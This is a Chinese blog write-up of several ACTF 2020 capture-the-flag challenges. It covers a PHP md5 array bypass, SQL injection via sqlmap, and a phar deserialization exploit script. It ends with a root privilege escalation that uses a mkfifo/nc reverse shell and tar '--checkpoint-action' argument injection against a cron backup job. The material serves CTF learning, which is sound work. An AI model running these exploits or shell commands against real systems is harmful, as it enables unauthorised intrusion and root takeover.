[ACTF 2020]部分Write-Up

中南大学联合其他几个大学办的比赛,今天题目开放了,来做了下,质量很高,很多题还无法明确思路,等一手wp

 

PHP代码审计入门题

<?php
error_reporting(0);
include_once "flag.php";
show_source(__FILE__);

session_start();


if(!isset($_POST['key'])) {
    die("not allow!");
}

if($_POST['key'] != $_SESSION['key']) {
    die("Wrong key!");
}

if(isset($_GET['username']) && isset($_GET['password'])) {
    if($_GET['username'] == $_GET['password']) {
        die("Your password can not be your username!");
    }
    if(md5($_GET['username']) === md5($_GET['password'])) {
        echo $flag;
    }
}

数组绕过+置空


SQL注入入门题

<?php
include 'config.php';

$id = $_GET['id'];
$sql = "select * from users where id=".$id;

$res = $conn->query($sql);

if($res){
    if($res->num_rows > 0) { 
        while ($row = $res->fetch_assoc()) {
            foreach($row as $key=>$value) {
                echo $key.": ".$value."<br/>";
            }
            echo "<br/>";
        } 
    } else { 
        //echo "This user doesn't exist.<br>"; 
    } 
}else{ 
        //echo "Error in query.<br>"; 
    } 
$conn->close();

highlight_file(__FILE__);

sqlmap一把梭


SimplePHP

phar反序列化

可以读到源码

<?php
 
class Show
{
    public $source;
    public $str;
    public function __construct($file)
    { 
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
    }
    public function __toString()
    {
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|flag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class S6ow
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->params[$key];
    }
    public function __call($name, $arguments)
    {
        if($this->{$name})
            $this->{$this->{$name}}($arguments);
    }
    public function file_get($value)
    {
        var_dump($this->file);
        echo $this->file;
    }
}
 
class Sh0w
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = new Show('index.php');
        $this->str->source = $this->test;
 
    }
    public function __destruct()
    {
        $this->str->_show();
    }
}

审下链子就知道最终用__toString()方法,而他的调用需要有类似echo方法。发现自定义函数file_get有echo

选择Sh0w类下的__destruct()方法可以新建一个show方法

<?php
class Sh0w
{
    public $test;
    public $str;
}
class S6ow
{
    public $file;
    public $params;
}
class Show
{
    public $str;
    public $source;
}
$a = new S6ow();
$b = new Show();
$c = new Sh0w();
$b ->source = '/flag';
$a ->params = array('_show' => 'file_get');
$a ->file = $b;
$c ->str = $a;


$phar = new Phar("1.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"." <?php __HALT_COMPILER(); ?>");
$phar->setMetadata($c);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

up up

www.zip给了个shell,连上后发现需要提权?等一手wp

https://github.com/CSUAuroraLab/ACTF2020

拿到shell后

python -c 'import pty;pty.spawn("/bin/bash")'创建流,方便切换用户交互

根目录:/flag_here的提示内容,flag在/root/下,需要提权。可以登录到用户actf

actf对 /home/actf具有写权限,可以写入sh

查看到/etc/crontab中有一个定时任务/etc/cron.daily/backup

利用此定时任务提权,在/home/actf/目录下执行:

nc -lp 8888 -vv

echo "mkfifo /tmp/jvenbd; nc 127.0.0.1 8888 0</tmp/jvenbd | /bin/sh >/tmp/jvenbd 2>&1; rm /tmp/jvenbd" > shell.sh && chmod +x shell.sh
echo > "--checkpoint-action=exec=sh shell.sh"
echo > "--checkpoint=1"

即可得到root用户的shell,拿到flag

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

Protected with IP Blacklist CloudIP Blacklist Cloud